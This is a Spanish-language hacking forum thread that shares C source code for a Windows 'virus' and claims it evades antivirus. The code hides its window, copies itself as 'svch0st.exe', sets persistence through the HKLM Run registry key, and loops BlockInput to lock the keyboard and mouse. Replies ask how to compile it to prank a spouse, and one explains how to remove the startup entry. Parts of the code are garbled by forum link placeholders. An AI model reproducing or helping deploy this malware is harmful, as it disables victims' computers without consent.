comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Programa un virus en C sin ser detectado por nada "Source"

  • 11 Respuestas
  • 12303 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado Dr0B4ck

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 0
  • Todos somos muy ignorantes. Lo que ocurre es que no todos ignoramos las mismas cosas...
    • MSN Messenger - dr0b4ck@hotmail.com
    • AOL Instant Messenger - dr0b4ck@hotmail.com
    • Yahoo Instant Messenger - dr0b4ck@hotmail.com
    • Ver Perfil
    • dr0b4ck-lab
« en: Noviembre 21, 2011, 11:56:48 pm »
Buenas Underc0de, sean bienvenidos a mi post, esta vez estare enseñando como crear un programa o virus, como ustedes lo quieran llamar, que bloquea el sistema, el raton y el teclado, solo tienen que añadirlo al inicio en el registro y todo esto sin ser detectado por ningun AntiVirus.

Código: C
  1. #include <windows.h>
  2. #include <tlhelp32.h>
  3. #include <winable.h>
  4.  
  5.  
  6. #define BUFSIZE 80
  7.  
  8. int test_key(void);
  9. int create_key(char *);
  10.  
  11.  
  12.  
  13. int main(void)
  14. {
  15. int test,create;
  16. test=test_key();
  17.  
  18. if (test==2)
  19. {
  20. char *path="c:\\WINDOWS\\svch0st.exe";
  21. create=create_key(path);
  22.  
  23. }
  24.  
  25. HWND inv;
  26. AllocConsole();
  27. inv=FindWindowA("ConsoleWindowClass",NULL);
  28. ShowWindow(inv,0);
  29. int c;
  30.  
  31. for(;;)
  32. {
  33. BlockInput(true);
  34. }
  35. char root[60]="C:\\Windows\\";
  36. char nombre[60]="svch0st";
  37. char path[256]="svch0st";
  38. You are not allowed to view links. Register or Login(nombre,".exe");
  39. You are not allowed to view links. Register or Login(root,nombre);
  40. HMODULE copiar = GetModuleHandle(0);
  41. GetModuleFileName(copiar, path, 256);
  42. CopyFile(path,root,false);
  43. }
  44.  
  45. int test_key(void)
  46. {
  47. int check;
  48. HKEY hKey;
  49. char path[BUFSIZE];
  50. DWORD buf_length=BUFSIZE;
  51. int reg_key;
  52.  
  53. reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
  54. if(reg_key!=0)
  55. {
  56. check=1;
  57. return check;
  58. }
  59.  
  60. reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length);
  61.  
  62. if((reg_key!=0)||(buf_length>BUFSIZE))
  63. check=2;
  64. if(reg_key==0)
  65. check=0;
  66.  
  67. RegCloseKey(hKey);
  68. return check;
  69. }
  70.  
  71. int create_key(char *path)
  72. {
  73. int reg_key,check;
  74.  
  75. HKEY hkey;
  76.  
  77. reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
  78. if(reg_key==0)
  79. {
  80. RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,You are not allowed to view links. Register or Login(path));
  81. check=0;
  82. return check;
  83. }
  84. if(reg_key!=0)
  85. check=1;
  86.  
  87. return check;
  88.  
  89. }


By Darax.
« Última modificación: Agosto 24, 2015, 06:36:04 am por rollth »
[♠] [♦] [♣] [♥] カřθBમčאּ[♠] [♦] [♣] [♥]

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
« Respuesta #1 en: Noviembre 22, 2011, 12:27:10 am »
By Darax.

Esto que acabas de hacer es de muy mal gusto, jamas te robes los creditos de un codigo que no es tuyo y mucho menos si no sabes ni un poco de C

Desconectado Dr0B4ck

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 0
  • Todos somos muy ignorantes. Lo que ocurre es que no todos ignoramos las mismas cosas...
    • MSN Messenger - dr0b4ck@hotmail.com
    • AOL Instant Messenger - dr0b4ck@hotmail.com
    • Yahoo Instant Messenger - dr0b4ck@hotmail.com
    • Ver Perfil
    • dr0b4ck-lab
« Respuesta #2 en: Noviembre 22, 2011, 10:26:01 pm »
You are not allowed to view links. Register or Login
By Darax.

Esto que acabas de hacer es de muy mal gusto, jamas te robes los creditos de un codigo que no es tuyo y mucho menos si no sabes ni un poco de C

Me disculpo men es que se me olvido salu2 !!
[♠] [♦] [♣] [♥] カřθBમčאּ[♠] [♦] [♣] [♥]

Desconectado Merlin

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Merlin969
« Respuesta #3 en: Junio 02, 2013, 02:02:02 am »
no hay un codigo mas smple?
lo digo porque uso linux y no uso ninguna libreria relacionada con windows... siquiera podrias mencionar su pseudocodigo?

Desconectado D4rkC0d3r

  • *
  • Underc0der
  • Mensajes: 202
  • Actividad:
    0%
  • Reputación 0
  • \xeb\x16\x5e\x31\xd2\
    • Ver Perfil
    • Ethical Hacking, Malware Analysis, Disinfection Techniques and more...
« Respuesta #4 en: Junio 02, 2013, 02:14:10 am »
Gracias por el aporte, a revisar que tal va.....

Saludos!!  :)

D4rkC0d3r

Desconectado eternalwolf

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Mayo 29, 2015, 08:46:25 pm »
You are not allowed to view links. Register or Login
no hay un codigo mas smple?
lo digo porque uso linux y no uso ninguna libreria relacionada con windows... siquiera podrias mencionar su pseudocodigo?

lo que hace el programa es manipular el registro de windows, pero lo mas importante a resaltar es esto

 
Código: You are not allowed to view links. Register or Login
for(;;)
{
BlockInput(true);
}

un ciclo infinito que prohibe la entrada de datos raton y teclado, que funcione o no, no estoy seguro, no me gustaria probarlo xd.

Desconectado EPARA

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Junio 15, 2015, 01:24:15 am »
Amigo disculpa mi ignorancia, pues apenas voy comenzando el primer semestre de ingenieria de sistemas, como hacemos que ese virus funciones? es decir hay que guardarlo bajo una extension en especifico en el block de nota o que? orientame por favor... Ah y por cierto como casi todo mal tiene cura; hay una manera de revertir el efecto de este virus, es para bromear con mi esposa y jugarle un ratro pero sin hacerle daño a su informacion...

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #7 en: Junio 15, 2015, 01:36:40 am »
Si quieres jugar con tu esposa y hacerle pasar el rato, elimina todo el C:/ con permisos de administrador.

Ya enserio, si eres persona casada y quieres hacer este tipo de jueguitos, dejame decirte que pareces mas un niño inmaduro, revisa como compilar que es C? minimamente sabes que es ello, andas comenzando investiga ;).

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1892
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #8 en: Junio 27, 2015, 11:54:58 am »
You are not allowed to view links. Register or Login
Amigo disculpa mi ignorancia, pues apenas voy comenzando el primer semestre de ingenieria de sistemas, como hacemos que ese virus funciones? es decir hay que guardarlo bajo una extension en especifico en el block de nota o que? orientame por favor... Ah y por cierto como casi todo mal tiene cura; hay una manera de revertir el efecto de este virus, es para bromear con mi esposa y jugarle un ratro pero sin hacerle daño a su informacion...

Simplemente copia el código en tu entorno y compilalo.

Investiga un poco, pues compilar en C es muy simple, te dejo algo que quizás te sirva de ayuda: You are not allowed to view links. Register or Login

Un saludo.



Desconectado fernando0101

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Junio 29, 2016, 06:10:25 pm »
 :) :'(  ;D Hola,  cómo se desactiva el virus, o no se puede?

« Última modificación: Junio 30, 2016, 04:45:19 pm por Gabriela »

Desconectado Stiuvert

  • *
  • Staff
  • *
  • Mensajes: 2664
  • Actividad:
    8.33%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #10 en: Junio 30, 2016, 04:33:13 am »
Citar
:) :'(  ;D Hola,  cómo se desactiva el virus, o no se puede?

Si te fijas en el code verás que se añade al registro de Windows

Código: You are not allowed to view links. Register or Login
HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey
Solamente elimina la entrada del arranque y listo.

Saludos
« Última modificación: Junio 30, 2016, 04:46:22 pm por Gabriela »

Desconectado fernando0101

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #11 en: Julio 01, 2016, 06:28:35 pm »
gracias ese es un rasonmaware

 

¿Te gustó el post? COMPARTILO!



[Reto en C] Programa que calcule la potencia de un numero

Iniciado por Crod1K

Respuestas: 2
Vistas: 5660
Último mensaje Abril 12, 2013, 12:46:51 am
por 85
[APORTE] Programa que hace que tiemble el mouse

Iniciado por binary112

Respuestas: 3
Vistas: 1026
Último mensaje Mayo 23, 2018, 02:30:27 am
por Mr.Tru
Programa en C ; Apaga el PC

Iniciado por Den udode

Respuestas: 7
Vistas: 4689
Último mensaje Febrero 03, 2016, 07:10:01 am
por Ominous
[Source] Juego de Formula 1 en C

Iniciado por wizardsec

Respuestas: 3
Vistas: 2088
Último mensaje Marzo 28, 2017, 06:23:04 pm
por Mr.Tru